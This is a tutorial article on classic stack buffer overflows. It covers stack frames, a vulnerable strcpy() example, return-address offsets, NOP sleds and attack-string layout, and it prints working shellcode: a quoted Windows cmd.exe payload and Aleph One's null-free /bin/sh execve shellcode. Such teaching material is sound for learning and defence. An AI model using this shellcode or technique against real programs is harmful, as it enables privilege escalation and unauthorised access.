Buffer Overflows
What is a buffer overflow?
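A buffer overflow is an input vulnerability: a program writes more data into a fixed-size buffer than the buffer can hold, and the excess overwrites adjacent memory. It is one of the most common classes of vulnerability.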
Review
When one function calls another, they follow these steps:
1. Input parameters are pushed onto the stack by the function doing the calling. These are parameters (or variables) that the called function takes as input.
2. The function is called. How does the program know where to go once the function called completes execution? It pushes a return address onto the stack, which will let the program resume execution somewhere in the function doing the calling.
3. The frame pointer is pushed onto the stack by the function which was called. Why is that? Well, when you call a function, a new stack frame is created (for that function), which will contain variables and return addresses for that function. In order to maneuver through these variables, a frame pointer is used.
4. Room on the stack is allocated for the local variables of the function being called.
5. Registers that the called function is going to modify may be saved on the stack, so that they can be restored before control returns to the function doing the calling.
The resulting stack will look as follows (highest memory address at the top):
| Input Parameters |
| Return Address |
| Frame Pointer |
| Local Variables |
| Saved Registers |
What causes the attack?
The attack is possible because the stack grows from high to low memory addresses, while an array is filled from low to high memory addresses. A write that runs past the end of a local buffer therefore moves toward the saved frame pointer and the return address, and enough data will overwrite them. Suppose we had the following function:
#include <string.h>

void function(char *string) {
    char buffer[128];
    /* strcpy() does no bounds checking: it copies until it reaches a null byte */
    strcpy(buffer, string);
}
The strcpy() function keeps copying until it hits a null character, regardless of the size of the destination. Thus, if the string is 136 bytes or more, it fully overwrites the return address. Why 136 bytes? Our buffer is 128 bytes, and this article assumes 32-bit x86, where addresses are 32 bits wide. Going back to our stack layout above, the frame pointer takes up 32 bits (4 bytes), and the return address takes up another 32 bits (4 bytes). Thus, 128 + 4 + 4 = 136: bytes 129 through 132 overwrite the frame pointer, and bytes 133 through 136 overwrite the return address. This assumes the compiler places nothing (padding, other locals, or a stack canary) between the buffer and the saved frame pointer.
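The 128 + 4 + 4 arithmetic can be checked with a small simulation. The sketch below is only an illustration, not the real stack: it models the frame of function() as a hypothetical struct (simulated_frame, with made-up field names and placeholder saved values) and writes into it with a clamped memset, so nothing outside the struct is ever touched. It assumes 4-byte saved values and no padding between the buffer and the return address.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical model of the callee's frame, lowest address first.
   Real compilers may add padding, canaries, or reorder locals. */
struct simulated_frame {
    unsigned char buffer[128];   /* the local buffer */
    uint32_t frame_pointer;      /* saved frame pointer (4 bytes) */
    uint32_t return_address;     /* saved return address (4 bytes) */
};

/* Placeholder values standing in for whatever the caller saved. */
#define ORIGINAL_FRAME_POINTER  0xBFFFF000u
#define ORIGINAL_RETURN_ADDRESS 0x08048000u

/* Writes input_len copies of fill starting at the beginning of a fresh
   simulated frame, the way an unchecked copy of that many bytes would,
   and returns the return address afterwards. The write is clamped to
   the struct so the simulation itself stays memory-safe. */
uint32_t simulate_unchecked_copy(size_t input_len, unsigned char fill)
{
    struct simulated_frame frame;
    memset(frame.buffer, 0, sizeof frame.buffer);
    frame.frame_pointer = ORIGINAL_FRAME_POINTER;
    frame.return_address = ORIGINAL_RETURN_ADDRESS;

    /* The layout assumption that the 136-byte figure depends on. */
    assert(offsetof(struct simulated_frame, return_address) == 128 + 4);

    if (input_len > sizeof frame)
        input_len = sizeof frame;
    memset(&frame, fill, input_len);
    return frame.return_address;
}
```

Under these assumptions, simulate_unchecked_copy(128, 'A') and simulate_unchecked_copy(132, 'A') both return the original placeholder address, while simulate_unchecked_copy(136, 'A') returns 0x41414141, because every byte of the return address slot now holds 0x41.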
How does the attack work?
You overflow the buffer with an attack string that contains shellcode and that also overwrites the return address. The new return address must point back into your buffer. When the call to our function returns, execution resumes at that modified address, and the shellcode within the buffer is executed by the current program (thus, you may get the computer to execute any instructions you wish).
What is shellcode?
It is code that starts a command shell. A shell is a piece of software that provides an interface for users, allowing access to kernel services. The kernel connects application software to hardware architecture. Writing shellcode requires knowing the architecture's assembly language. You will usually need to write different shellcode for different operating systems or hardware architectures. Consider the following shellcode example.
unsigned char shellcode[] =
"\xB8\xFF\xEF\xFF\xFF\xF7\xD0\x2B\xE0\x55\x8B\xEC"
"\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63\xC6\x45"
"\xF9\x6D\xC6\x45\xFA\x64\xC6\x45\xFB\x2E\xC6\x45"
"\xFC\x65\xC6\x45\xFD\x78\xC6\x45\xFE\x65\x8D\x45"
"\xF8\x50\xBB\xC7\x93\xBF\x77\xFF\xD3";
This is a 57-byte shellcode which is advertised to execute cmd.exe under Windows XP SP2. It was written by Mountassif Moad (I have not tested it, nor can I certify it works; what you do with it is not my responsibility). Whatever the shellcode provides to the exploiter is called a payload (in this case the payload is access to cmd.exe).
What kind of payload do you want?
In most cases, the program you want to exploit will run as root, or as some user that has very high security privileges. You will want to gain a command shell so that you may perform many privileged tasks (it's assumed that you are not running as an administrator, but as a user with fewer privileges). To gain a command shell in UNIX, you would execute "/bin/sh" with a call from the exec family, such as execve(). To obtain a command shell in Windows, the equivalent is to launch cmd.exe. The following block of C code can be used in UNIX to replace a currently running program with a shell.
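#include <stddef.h>   /* NULL */
#include <unistd.h>   /* execve() */

int main(void) {
    char *arguments[2];
    arguments[0] = "/bin/sh";
    arguments[1] = NULL;
    /* Replaces the current process image with /bin/sh; returns only on failure */
    execve(arguments[0], arguments, NULL);
    return 1;
}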
You can compile this code, disassemble it in a debugger, and use the result as shellcode, but it will usually be too long for practical purposes. In any case, disassembling main() above will show you how execve() sets up its system call, so that you may produce an optimized shellcode which does something like the following:
1. It starts by initializing registers. To do this, it needs the exact address of the "/bin/sh" string at run time. This is usually done as in Aleph One's shellcode below: the string is placed at the very end, directly after a call instruction. The code jumps to that call, and the call pushes the address of the string (as its return address) and transfers control back to the top, where the address is popped into a register. Notice how the jump spans nearly the entire length of the shellcode.
2. Execute the int $0x80 instruction (a software interrupt that traps into the kernel).
3. The kernel runs the system call selected by the registers, in this case execve().
Aleph One's shellcode disassembly:
jmp    0x2a
popl   %esi
movl   %esi,0x8(%esi)
movb   $0x0,0x7(%esi)
movl   $0x0,0xc(%esi)
movl   $0xb,%eax
movl   %esi,%ebx
leal   0x8(%esi),%ecx
leal   0xc(%esi),%edx
int    $0x80
movl   $0x1,%eax
movl   $0x0,%ebx
int    $0x80
call   -0x2f
.string "/bin/sh"
Once again, the jump is made to the call at the very end (jmp 0x2a), and the call then transfers control back to the top, where we pop the address of the string (call -0x2f). To get this shellcode to work within a buffer, you need it in the form of a binary string. Assembling this code and dumping the resulting bytes gives the following:
char shellcode[] =
"\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
"\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
"\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";
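The problem with this shellcode is that it contains \x00 bytes, and \x00 is the null terminating character. Why is this bad? String functions such as strcpy() stop copying once they hit a null byte, so anything after the first \x00 would never reach the buffer. We must make sure that our shellcode does not contain a null byte. Replacing each instruction that embeds a literal zero with an equivalent that does not (for example, clearing a register with xorl %eax,%eax and storing from that register) gives us the following shellcode: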
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
This is the final product, and is what you place in your attack string.
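The null-byte constraint can be checked mechanically before a byte string is used. The following is a minimal sketch of such a check; the function name first_null_byte and the two sample arrays are illustrative, and the arrays hold only the first ten bytes of each listing above.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Returns the index of the first 0x00 byte in data[0..len), or -1 if
   there is none. A string function such as strcpy() would stop copying
   at that index. */
long first_null_byte(const unsigned char *data, size_t len)
{
    assert(data != NULL || len == 0);
    if (len == 0)
        return -1;
    const unsigned char *hit = memchr(data, 0x00, len);
    return hit ? (long)(hit - data) : -1;
}

/* First ten bytes of the listing that still contains null bytes. */
const unsigned char unoptimized_prefix[] = {
    0xeb, 0x2a, 0x5e, 0x89, 0x76, 0x08, 0xc6, 0x46, 0x07, 0x00
};

/* First ten bytes of the listing with the null bytes removed. */
const unsigned char optimized_prefix[] = {
    0xeb, 0x1f, 0x5e, 0x89, 0x76, 0x08, 0x31, 0xc0, 0x88, 0x46
};
```

Calling first_null_byte() on unoptimized_prefix returns 9, the position of the zero byte embedded by movb $0x0,0x7(%esi), so a strcpy() would copy only the first nine bytes. On optimized_prefix it returns -1.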
Exploit Formatting
We know that our shellcode is in the attack buffer, but we do not know at what memory address it is located. We have to guess the location of the shellcode (our return address will point to where we think the buffer is in memory). To improve our odds we can make use of NOPs. A NOP is an instruction that does nothing except let execution continue with the next instruction (on x86 it is the single byte 0x90). When placed in front of the shellcode, NOPs widen the range of addresses that work, because if we land on any NOP, execution runs forward through the rest of them and into our shellcode. Thus, an attack buffer can be constructed as follows (lowest memory address on the left):
| NOPs | Shellcode | New Return Address |
If we end up modifying our return address to point anywhere in the NOP region above, our shellcode will eventually get executed. This region of NOPs is called a NOP sled.
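To see why the sled helps with guessing, it is enough to count the addresses that work. The sketch below is a toy model under stated assumptions: the names guess_reaches_shellcode and working_guesses are hypothetical, addresses are 32 bits wide, and every NOP is one byte long, so the shellcode starts exactly sled_len bytes after the start of the buffer.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* True if a return address of guess leads to the shellcode: either it
   lands on one of the sled_len NOPs and slides forward, or it lands
   exactly on the first byte of the shellcode. */
bool guess_reaches_shellcode(uint32_t buffer_start, uint32_t sled_len,
                             uint32_t guess)
{
    /* The sled must fit in the 32-bit address space. */
    assert(sled_len <= UINT32_MAX - buffer_start);
    return guess >= buffer_start && guess - buffer_start <= sled_len;
}

/* Number of distinct return addresses that work for a given sled length. */
uint32_t working_guesses(uint32_t sled_len)
{
    return sled_len + 1u;
}
```

With no sled there is exactly one working address, the first byte of the shellcode. With a 64-byte sled there are 65, so the guess can be off by up to 64 bytes in one direction and still succeed.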
Summary
1. The buffer is overflowed (within the buffer's contents we place a NOP sled followed by our shellcode).
2. The overflow continues past the end of the buffer until the return address is overwritten with an address that we guess lies within the buffer.
3. Assuming the guess is within the NOP sled or exactly at the start of the shellcode, when our function call returns it executes our shellcode (possibly after sliding up the NOP sled until it reaches the shellcode).
4. The exploiter receives whatever payload the shellcode provides.
Thank you for reading this article. If you have any suggestions or need clarification please do not hesitate to start a thread on my forum or to send me an e-mail. There is no such thing as a stupid question, but there is such a thing as a stupid fear of asking.